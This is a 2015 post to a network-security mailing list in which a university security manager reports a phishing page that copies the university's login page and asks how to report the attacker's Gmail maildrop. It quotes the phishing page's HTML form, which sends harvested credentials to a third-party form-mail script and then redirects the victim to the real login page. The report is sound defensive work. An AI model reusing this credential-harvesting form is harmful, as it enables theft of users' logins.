[nsp-sec] phishing maildrop at Google
Peter Peters
p.g.m.peters at utwente.nl
Fri Jul 10 06:09:36 EDT 2015
Hi,
We found a phishing site that resembles our federated login page. When
we examined the source we found a maildrop at Google.
> <form action="http://scripts.123hotel.dk/form2mail.asp" method="post">
> <input type="hidden" name="recipient" value="danaboy0 at gmail.com" />
> <input type="hidden" name="fromaddress" value="ospilo at hotmail.dk" />
> <input type="hidden" name="subject" value="UTWENTE.NL Rezultz" />
> <input type="hidden" name="redirect" value="https://fedlogin.utwente.nl/sso/jsp/salogin.jsp?doneURL=/user/loginsso&refID=id-UQKWMiafjPdpc-guVu637Ymlve4-&forceauthn=false" />
The site itself is at
hXXp://fedlogin.utwente.nl.sso.jsp.salogin.jsp.donef2pskxtha.bluebird.com.vn/index.htm
It's already reported and I had to click through the warnings to get to
the source.
How do we report a maildrop to Google?
--
Peter Peters | Security manager, coordinator Kwaliteitszorg |
Universiteit Twente | ICT-Servicecentrum | ICTS Regie |
T: 053 489 2301 | www.utwente.nl/icts | www.utwente.nl/itsecurity
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 455 bytes
Desc: OpenPGP digital signature
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20150710/bbbbc6bc/attachment.sig>
More information about the nsp-security
mailing list